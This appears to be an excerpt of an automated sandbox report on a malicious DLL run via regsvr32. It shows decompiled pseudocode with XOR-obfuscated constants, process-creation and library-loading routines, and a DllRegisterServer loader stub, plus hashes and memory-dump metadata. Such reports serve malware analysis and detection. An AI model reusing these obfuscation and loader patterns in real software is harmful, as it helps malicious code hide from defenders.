                                                                                                                0x001a4d33
                                                                                                                0x001a4d3a
                                                                                                                0x001a4d41
                                                                                                                0x001a4d4d
                                                                                                                0x001a4d4e
                                                                                                                0x001a4d53
                                                                                                                0x001a4d5a
                                                                                                                0x001a4d61
                                                                                                                0x001a4d68
                                                                                                                0x001a4d6f
                                                                                                                0x001a4d76
                                                                                                                0x001a4d7d
                                                                                                                0x001a4d84
                                                                                                                0x001a4d88
                                                                                                                0x001a4d8f
                                                                                                                0x001a4d96
                                                                                                                0x001a4d9d
                                                                                                                0x001a4da9
                                                                                                                0x001a4daf
                                                                                                                0x001a4db6
                                                                                                                0x001a4dbd
                                                                                                                0x001a4dc4
                                                                                                                0x001a4dc8
                                                                                                                0x001a4dcc
                                                                                                                0x001a4ddf
                                                                                                                0x001a4dfa
                                                                                                                0x001a4e10
                                                                                                                0x001a4e25
                                                                                                                0x001a4e2b
                                                                                                                0x001a4e47
                                                                                                                0x001a4e52
                                                                                                                0x001a4e5b
                                                                                                                0x001a4e64
                                                                                                                0x001a4e78
                                                                                                                0x001a4e7c
                                                                                                                0x001a4e86
                                                                                                                0x001a4e8e

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: +=8$76(N
                                                                                                                • API String ID: 3080627654-1438774008
                                                                                                                • Opcode ID: 1db2f9c43d7fe5329084669e1915b1fd4bcac671b522587addb6cecd1a5ce235
                                                                                                                • Instruction ID: b3ac722914aca84fd3b03b61ecb27d3b7be9c2aa2742dd19d200f7d965ac84c8
                                                                                                                • Opcode Fuzzy Hash: 1db2f9c43d7fe5329084669e1915b1fd4bcac671b522587addb6cecd1a5ce235
                                                                                                                • Instruction Fuzzy Hash: 84A10EB5C0131DABDF58CFE0D98A8DEBBB1FB44318F208159E512BA260E7B45A49CF54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B4E54 Relevance: 2.7, Strings: 2, Instructions: 159COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E001B4E54(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v84;
				char _v88;
				char _v156;
				void* _t156;
				void* _t170;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t197;
				void* _t198;

				_push(_a28);
				_t197 = _a8;
				_t198 = __edx;
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_t197);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t156);
				_v40 = 0x8b4c58;
				_v40 = _v40 + 0x3f86;
				_v40 = _v40 ^ 0x0082ad4e;
				_v72 = 0x63ffc4;
				_v72 = _v72 + 0xffd;
				_v72 = _v72 ^ 0x00606d7d;
				_v20 = 0x648a46;
				_t177 = 0x59;
				_v20 = _v20 / _t177;
				_v20 = _v20 + 0xffff461a;
				_v20 = _v20 ^ 0x0006794c;
				_v12 = 0x98a9f4;
				_v12 = _v12 | 0x13bbb8d1;
				_v12 = _v12 + 0xffffa770;
				_v12 = _v12 + 0xffff8581;
				_v12 = _v12 ^ 0x13b5c991;
				_v48 = 0x38418a;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 ^ 0x000154a6;
				_v44 = 0xc8a2b4;
				_v44 = _v44 + 0xbd91;
				_v44 = _v44 ^ 0x00ca080f;
				_v60 = 0xcded71;
				_t178 = 0x4e;
				_v60 = _v60 * 0x1e;
				_v60 = _v60 ^ 0x1827e9c1;
				_v68 = 0x803c26;
				_v68 = _v68 ^ 0x63fbc15d;
				_v68 = _v68 ^ 0x637bcf1b;
				_v24 = 0x289a39;
				_v24 = _v24 << 4;
				_v24 = _v24 + 0xffff7bb8;
				_v24 = _v24 ^ 0x028e7e6c;
				_v52 = 0x412de9;
				_v52 = _v52 + 0x5e90;
				_v52 = _v52 ^ 0x004be294;
				_v32 = 0x94c3a9;
				_v32 = _v32 | 0x0fecc031;
				_v32 = _v32 + 0xffff9b05;
				_v32 = _v32 ^ 0x0ffef52e;
				_v28 = 0x44b86e;
				_v28 = _v28 + 0xffff4ad6;
				_v28 = _v28 << 5;
				_v28 = _v28 ^ 0x088c7c61;
				_v8 = 0x1102ec;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0xeea5506c;
				_v8 = _v8 + 0x37bd;
				_v8 = _v8 ^ 0xeee8d4e0;
				_v56 = 0x3afb12;
				_v56 = _v56 / _t178;
				_v56 = _v56 ^ 0x000dc862;
				_v16 = 0x278;
				_t179 = 0xe;
				_v16 = _v16 / _t179;
				_v16 = _v16 << 4;
				_v16 = _v16 | 0xcf204b72;
				_v16 = _v16 ^ 0xcf251045;
				_v36 = 0xa5e031;
				_t180 = 0x51;
				_v36 = _v36 / _t180;
				_v36 = _v36 ^ 0x1a3a5efb;
				_v36 = _v36 ^ 0x1a36e331;
				_v64 = 0x1d2bd;
				_v64 = _v64 ^ 0xe4a507ac;
				_v64 = _v64 ^ 0xe4adbaf3;
				_t181 = _v40;
				E001B25CD(_v40, _v72, 0x44, _v20,  &_v156);
				_v156 = 0x44;
				_t170 = E001A816B( &_v156, _v12, _v48, _v44, _v40, _v60, _v68, _t181, _v24, _t181, _a16, _t181, _v52, _v32,  &_v88, _a4, _t198); // executed
				if(_t170 == 0) {
					return 0;
				}
				if(_t197 == 0) {
					E001B02D8(_v88, _v28, _v8, _v56);
					E001B02D8(_v84, _v16, _v36, _v64);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}































                                                                                                                0x001b4e5f
                                                                                                                0x001b4e62
                                                                                                                0x001b4e65
                                                                                                                0x001b4e67
                                                                                                                0x001b4e69
                                                                                                                0x001b4e6c
                                                                                                                0x001b4e6f
                                                                                                                0x001b4e72
                                                                                                                0x001b4e73
                                                                                                                0x001b4e76
                                                                                                                0x001b4e77
                                                                                                                0x001b4e78
                                                                                                                0x001b4e7d
                                                                                                                0x001b4e86
                                                                                                                0x001b4e8d
                                                                                                                0x001b4e94
                                                                                                                0x001b4e9b
                                                                                                                0x001b4ea2
                                                                                                                0x001b4ea9
                                                                                                                0x001b4eb5
                                                                                                                0x001b4eba
                                                                                                                0x001b4ebf
                                                                                                                0x001b4ec6
                                                                                                                0x001b4ecd
                                                                                                                0x001b4ed4
                                                                                                                0x001b4edb
                                                                                                                0x001b4ee2
                                                                                                                0x001b4ee9
                                                                                                                0x001b4ef0
                                                                                                                0x001b4ef7
                                                                                                                0x001b4efb
                                                                                                                0x001b4f02
                                                                                                                0x001b4f09
                                                                                                                0x001b4f10
                                                                                                                0x001b4f17
                                                                                                                0x001b4f22
                                                                                                                0x001b4f25
                                                                                                                0x001b4f28
                                                                                                                0x001b4f2f
                                                                                                                0x001b4f36
                                                                                                                0x001b4f3d
                                                                                                                0x001b4f44
                                                                                                                0x001b4f4b
                                                                                                                0x001b4f4f
                                                                                                                0x001b4f56
                                                                                                                0x001b4f5d
                                                                                                                0x001b4f64
                                                                                                                0x001b4f6b
                                                                                                                0x001b4f72
                                                                                                                0x001b4f79
                                                                                                                0x001b4f80
                                                                                                                0x001b4f87
                                                                                                                0x001b4f8e
                                                                                                                0x001b4f95
                                                                                                                0x001b4f9c
                                                                                                                0x001b4fa0
                                                                                                                0x001b4fa7
                                                                                                                0x001b4fae
                                                                                                                0x001b4fb2
                                                                                                                0x001b4fb9
                                                                                                                0x001b4fc0
                                                                                                                0x001b4fc7
                                                                                                                0x001b4fd5
                                                                                                                0x001b4fd8
                                                                                                                0x001b4fdf
                                                                                                                0x001b4fe9
                                                                                                                0x001b4fec
                                                                                                                0x001b4ff1
                                                                                                                0x001b4ff5
                                                                                                                0x001b4ffc
                                                                                                                0x001b5003
                                                                                                                0x001b500f
                                                                                                                0x001b5012
                                                                                                                0x001b501b
                                                                                                                0x001b5022
                                                                                                                0x001b5029
                                                                                                                0x001b5030
                                                                                                                0x001b5037
                                                                                                                0x001b5045
                                                                                                                0x001b504a
                                                                                                                0x001b5052
                                                                                                                0x001b5089
                                                                                                                0x001b5093
                                                                                                                0x00000000
                                                                                                                0x001b50cc
                                                                                                                0x001b5097
                                                                                                                0x001b50b1
                                                                                                                0x001b50c2
                                                                                                                0x001b5099
                                                                                                                0x001b509c
                                                                                                                0x001b509d
                                                                                                                0x001b509e
                                                                                                                0x001b509f
                                                                                                                0x001b509f
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID: }m`$-A
                                                                                                                • API String ID: 963392458-3093481195
                                                                                                                • Opcode ID: 87e7d8104ef8cc2791b0dfc9e4b40d4090cb19fabad17ace80fb2e6409c610f3
                                                                                                                • Instruction ID: 44a9ba2d91a9e50ddad3a40d467fbda365e9b4dea385334552f3f9f53ab3ffbb
                                                                                                                • Opcode Fuzzy Hash: 87e7d8104ef8cc2791b0dfc9e4b40d4090cb19fabad17ace80fb2e6409c610f3
                                                                                                                • Instruction Fuzzy Hash: B57132B1C00209EFDF59DFE0C94A9EEBBB2FB08314F208149E516B6260D7B51A59CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A303A Relevance: 2.5, Strings: 2, Instructions: 48COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001A303A(intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t63;

				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0xfda899;
				_v28 = 0xb23799;
				_v28 = _v28 + 0xffff542a;
				_v28 = _v28 ^ 0x00b18bcb;
				_v16 = 0xcc2eb1;
				_v16 = _v16 + 0x140d;
				_v16 = _v16 + 0xe157;
				_v16 = _v16 ^ 0x00c8c1af;
				_v12 = 0x2f1bcc;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x0ba208da;
				_v12 = _v12 ^ 0x1b909a0d;
				_v32 = 0x801efb;
				_v32 = _v32 | 0x660ebd1c;
				_v32 = _v32 ^ 0x66871f8f;
				_v8 = 0x3c2a32;
				_v8 = _v8 ^ 0x6845a1ec;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0xffffc82b;
				_v8 = _v8 ^ 0x0016235f;
				_v20 = 0xacccf8;
				_v20 = _v20 ^ 0xc45fdca9;
				_v20 = _v20 + 0xffff1486;
				_v20 = _v20 ^ 0xc4f88220;
				_v24 = 0x760d9f;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000770d7;
				_t63 = E001A3506(_v32, _v8, E001B345B(), _a8, _v20, _v28, _v24); // executed
				return _t63;
			}














                                                                                                                0x001a3040
                                                                                                                0x001a3044
                                                                                                                0x001a3048
                                                                                                                0x001a304f
                                                                                                                0x001a3056
                                                                                                                0x001a305d
                                                                                                                0x001a3064
                                                                                                                0x001a306b
                                                                                                                0x001a3072
                                                                                                                0x001a3079
                                                                                                                0x001a3080
                                                                                                                0x001a308b
                                                                                                                0x001a308e
                                                                                                                0x001a3095
                                                                                                                0x001a309c
                                                                                                                0x001a30a3
                                                                                                                0x001a30aa
                                                                                                                0x001a30b1
                                                                                                                0x001a30b8
                                                                                                                0x001a30bf
                                                                                                                0x001a30c3
                                                                                                                0x001a30ca
                                                                                                                0x001a30d1
                                                                                                                0x001a30d8
                                                                                                                0x001a30df
                                                                                                                0x001a30e6
                                                                                                                0x001a30ed
                                                                                                                0x001a30f4
                                                                                                                0x001a30f8
                                                                                                                0x001a311d
                                                                                                                0x001a3128

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID: 2*<$W
                                                                                                                • API String ID: 1279760036-2887220841
                                                                                                                • Opcode ID: ebc570e0260719ffb43f7d75e55fb17aa819b37f5b8bab0ae8db23e12aeef9f6
                                                                                                                • Instruction ID: e83ea437900eea39fc09c1850f4a5aa8a55b3260706ee4e830488804c52254fe
                                                                                                                • Opcode Fuzzy Hash: ebc570e0260719ffb43f7d75e55fb17aa819b37f5b8bab0ae8db23e12aeef9f6
                                                                                                                • Instruction Fuzzy Hash: C921EDB2C0131EEBCF44DFE5C98A5EEBBB1BB10318F208188D81576260D3B90B599F81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C1E49 Relevance: .1, Instructions: 86COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001C1E49(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _t103;
				intOrPtr _t108;
				signed int _t118;
				signed int _t119;
				signed int _t120;

				_v52 = _v52 & 0x00000000;
				_v56 = 0x7b893f;
				_v24 = 0x7941d;
				_v24 = _v24 | 0xfcbc9831;
				_v24 = _v24 ^ 0xd93b5a3b;
				_v24 = _v24 ^ 0x25863428;
				_v20 = 0x17f4d9;
				_v20 = _v20 + 0xb603;
				_t118 = __edx;
				_t119 = 0xb;
				_v20 = _v20 / _t119;
				_v20 = _v20 ^ 0x0007bd91;
				_v16 = 0xfedb2c;
				_v16 = _v16 + 0xffff9b1b;
				_v16 = _v16 | 0x7dccd111;
				_v16 = _v16 ^ 0x7df93b9c;
				_v8 = 0xfa06c5;
				_v8 = _v8 | 0xe70a8a77;
				_v8 = _v8 + 0xffff57f1;
				_v8 = _v8 | 0x4389081f;
				_v8 = _v8 ^ 0xe7fa7ec9;
				_v40 = 0x89cd06;
				_v40 = _v40 << 3;
				_v40 = _v40 ^ 0x04459330;
				_v36 = 0x306a94;
				_v36 = _v36 >> 0x10;
				_v36 = _v36 ^ 0x000800bb;
				_v32 = 0x4303d4;
				_v32 = _v32 + 0xffffc166;
				_v32 = _v32 ^ 0x004bd8c3;
				_v28 = 0xc35dbb;
				_v28 = _v28 + 0xffff2b1a;
				_v28 = _v28 << 6;
				_v28 = _v28 ^ 0x30aa85a8;
				_v48 = 0x733cdc;
				_v48 = _v48 << 0x10;
				_v48 = _v48 ^ 0x3cd4e881;
				_v12 = 0xc7c271;
				_t120 = 0x51;
				_v12 = _v12 * 0x7c;
				_v12 = _v12 / _t120;
				_v12 = _v12 | 0x6cb4213e;
				_v12 = _v12 ^ 0x6db68ebc;
				_v44 = 0xf83c0b;
				_v44 = _v44 ^ 0x0c4208a3;
				_v44 = _v44 ^ 0x0cbae11e;
				_push(_v8);
				_push(__ecx);
				_push(_v16);
				_t103 = E001A4A9D(_v40, E001BF5D9(_v24, _v20, _v44), _v36, _v32); // executed
				_t108 =  *0x1c4210; // 0x6514d8
				 *((intOrPtr*)(_t108 + 0x14 + _t118 * 4)) = _t103;
				return E001BF94B(_t102, _v28, _v48, _v12, _v44);
			}





















                                                                                                                0x001c1e4f
                                                                                                                0x001c1e53
                                                                                                                0x001c1e5a
                                                                                                                0x001c1e61
                                                                                                                0x001c1e68
                                                                                                                0x001c1e6f
                                                                                                                0x001c1e76
                                                                                                                0x001c1e7d
                                                                                                                0x001c1e8b
                                                                                                                0x001c1e8f
                                                                                                                0x001c1e94
                                                                                                                0x001c1e99
                                                                                                                0x001c1ea0
                                                                                                                0x001c1ea7
                                                                                                                0x001c1eae
                                                                                                                0x001c1eb5
                                                                                                                0x001c1ebc
                                                                                                                0x001c1ec3
                                                                                                                0x001c1eca
                                                                                                                0x001c1ed1
                                                                                                                0x001c1ed8
                                                                                                                0x001c1edf
                                                                                                                0x001c1ee6
                                                                                                                0x001c1eea
                                                                                                                0x001c1ef1
                                                                                                                0x001c1ef8
                                                                                                                0x001c1efc
                                                                                                                0x001c1f03
                                                                                                                0x001c1f0a
                                                                                                                0x001c1f11
                                                                                                                0x001c1f18
                                                                                                                0x001c1f1f
                                                                                                                0x001c1f26
                                                                                                                0x001c1f2a
                                                                                                                0x001c1f31
                                                                                                                0x001c1f38
                                                                                                                0x001c1f3c
                                                                                                                0x001c1f43
                                                                                                                0x001c1f4e
                                                                                                                0x001c1f4f
                                                                                                                0x001c1f57
                                                                                                                0x001c1f5a
                                                                                                                0x001c1f61
                                                                                                                0x001c1f68
                                                                                                                0x001c1f6f
                                                                                                                0x001c1f76
                                                                                                                0x001c1f7d
                                                                                                                0x001c1f80
                                                                                                                0x001c1f81
                                                                                                                0x001c1f9c
                                                                                                                0x001c1fa4
                                                                                                                0x001c1fb3
                                                                                                                0x001c1fc6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: fc64d75d84e65bf520ae7a3c36e371424e9e7db499587eaa783adfdd386c487a
                                                                                                                • Instruction ID: 2a11169fe9f844493a4505571730a98cc366415580bd36bbf1f0769a31e4426f
                                                                                                                • Opcode Fuzzy Hash: fc64d75d84e65bf520ae7a3c36e371424e9e7db499587eaa783adfdd386c487a
                                                                                                                • Instruction Fuzzy Hash: 0A410EB5D01219EBDF44DFE5C98A5EEBFB1FB48314F208149D912B6260C3B50A46CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10008B40 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 52COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10008B40() {
				struct HWND__* _t3;
				int _t4;

				if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
					GetLastError();
				}
				ShowWindow(0, 0); // executed
				_t3 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
				if(_t3 != 0) {
					ShowWindow(0, 0);
				}
				_t4 =  *0x1006f044; // 0x6419c8
				if(_t4 == 0) {
					ExitProcess(_t4);
				}
				_push("DllRegisterServer");
				_push(_t4);
				 *((intOrPtr*)(E10008380()))(); // executed
				return 0;
			}





                                                                                                                0x10008b72
                                                                                                                0x10008b74
                                                                                                                0x10008b74
                                                                                                                0x10008b85
                                                                                                                0x10008bb1
                                                                                                                0x10008bb9
                                                                                                                0x10008bbf
                                                                                                                0x10008bbf
                                                                                                                0x10008bc1
                                                                                                                0x10008bc9
                                                                                                                0x10008bcc
                                                                                                                0x10008bcc
                                                                                                                0x10008bd2
                                                                                                                0x10008bd7
                                                                                                                0x10008be0
                                                                                                                0x10008be4

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32 ref: 10008B6A
                                                                                                                • GetLastError.KERNEL32 ref: 10008B74
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10008B85
                                                                                                                • CreateWindowExA.USER32 ref: 10008BB1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10008BBF
                                                                                                                • ExitProcess.KERNEL32 ref: 10008BCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow$ErrorExitLastProcess
                                                                                                                • String ID: DllRegisterServer$FormClass$MainConsole$One Click$StartForme
                                                                                                                • API String ID: 356722023-2283933193
                                                                                                                • Opcode ID: 181e8cfece939c6a5b0c2741fce88801048a0eca096d6e8e4d2ba9673e7e7e6d
                                                                                                                • Instruction ID: ec2ba97d3f5162f2acf2e910e2fcad84b18f71ae29f693a90e351d4cbeecfad5
                                                                                                                • Opcode Fuzzy Hash: 181e8cfece939c6a5b0c2741fce88801048a0eca096d6e8e4d2ba9673e7e7e6d
                                                                                                                • Instruction Fuzzy Hash: CF01E7757C8324BAF6719BA46C8BF862A98AB48F81F110001F749FE0D5EBD0B6049669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002D2C7 Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002D2C7() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				void* _t72;
				intOrPtr _t78;
				signed char* _t81;
				signed int _t83;
				void* _t87;
				signed int _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_push(_t72);
				_push(_t69);
				_push(_t89);
				_t87 = _t72;
				_t1 = _t87 + 0x1c; // 0x10070ce8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t87 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t87 + 8; // 0x3
				_t83 =  *_t4;
				if(_t83 >= _t40) {
					L7:
					_t83 = 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t89 = _t21;
						_t22 = _t87 + 0x10; // 0x650cf0
						_t41 =  *_t22;
						if(_t41 != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E10001710(_t89, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E10001710(_t89, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t87 + 4; // 0x20
							E1003BB70(_t83, _t70 +  *_t25 * 8, 0, _t89 -  *_t25 << 3);
							 *(_t87 + 4) = _t89;
							 *(_t87 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t87 + 0x10; // 0x650cf0
							_t87 =  *_t23;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v4);
							_push(_t89);
							_t91 = _t94;
							_push(_t72);
							_v28 = 0x1006c808;
							E1003D2F0( &_v28, 0x10065188);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t72);
							_v36 = 0x1006c8a0;
							E1003D2F0( &_v36, 0x100651e8);
							asm("int3");
							_push(_t92);
							_push(_t72);
							_v44 = 0x1006c938;
							E1003D2F0( &_v44, 0x1006522c);
							asm("int3");
							_push(4);
							E1003D1E6(E10052A8D, _t69, _t83, _t87);
							_t78 = E1002D12C(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E10022AE3(_t78);
							}
							return E1003D2BE(_t64);
						}
					} else {
						_t18 = _t87 + 0x10; // 0x650cf0
						_t81 =  *_t18 + 8;
						while(( *_t81 & 0x00000001) != 0) {
							_t83 = _t83 + 1;
							_t81 =  &(_t81[8]);
							if(_t83 < _t40) {
								continue;
							}
							break;
						}
						if(_t83 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x650cf0
					__ecx =  *_t13;
					if(( *( *_t13 + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t87 + 0xc; // 0x3
						if(_t83 >=  *_t30) {
							_t31 = _t83 + 1; // 0x4
							 *((intOrPtr*)(_t87 + 0xc)) = _t31;
						}
						_t33 = _t87 + 0x10; // 0x650cf0
						 *( *_t33 + _t83 * 8) =  *( *_t33 + _t83 * 8) | 0x00000001;
						_t37 = _t83 + 1; // 0x4
						 *(_t87 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t83;
					} else {
						goto L7;
					}
				}
			}































                                                                                                                0x1002d2c7
                                                                                                                0x1002d2c8
                                                                                                                0x1002d2c9
                                                                                                                0x1002d2cb
                                                                                                                0x1002d2cd
                                                                                                                0x1002d2cd
                                                                                                                0x1002d2d2
                                                                                                                0x1002d2d6
                                                                                                                0x1002d2dc
                                                                                                                0x1002d2dc
                                                                                                                0x1002d2df
                                                                                                                0x1002d2df
                                                                                                                0x1002d2e4
                                                                                                                0x1002d2f3
                                                                                                                0x1002d2f5
                                                                                                                0x1002d2f8
                                                                                                                0x1002d315
                                                                                                                0x1002d315
                                                                                                                0x1002d315
                                                                                                                0x1002d318
                                                                                                                0x1002d318
                                                                                                                0x1002d31d
                                                                                                                0x1002d33b
                                                                                                                0x1002d33e
                                                                                                                0x1002d34c
                                                                                                                0x1002d352
                                                                                                                0x1002d355
                                                                                                                0x1002d31f
                                                                                                                0x1002d322
                                                                                                                0x1002d328
                                                                                                                0x1002d32c
                                                                                                                0x1002d32c
                                                                                                                0x1002d35d
                                                                                                                0x1002d38a
                                                                                                                0x1002d38c
                                                                                                                0x1002d39d
                                                                                                                0x1002d3a5
                                                                                                                0x1002d3a8
                                                                                                                0x00000000
                                                                                                                0x1002d35f
                                                                                                                0x1002d35f
                                                                                                                0x1002d35f
                                                                                                                0x1002d364
                                                                                                                0x1002d36e
                                                                                                                0x1002d36e
                                                                                                                0x1002d378
                                                                                                                0x1001726a
                                                                                                                0x1001726b
                                                                                                                0x1001726d
                                                                                                                0x10017277
                                                                                                                0x1001727e
                                                                                                                0x10017283
                                                                                                                0x10017284
                                                                                                                0x10017285
                                                                                                                0x10017287
                                                                                                                0x10017291
                                                                                                                0x10017298
                                                                                                                0x1001729d
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x1002d2fa
                                                                                                                0x1002d2fa
                                                                                                                0x1002d2fd
                                                                                                                0x1002d300
                                                                                                                0x1002d305
                                                                                                                0x1002d306
                                                                                                                0x1002d30b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002d30b
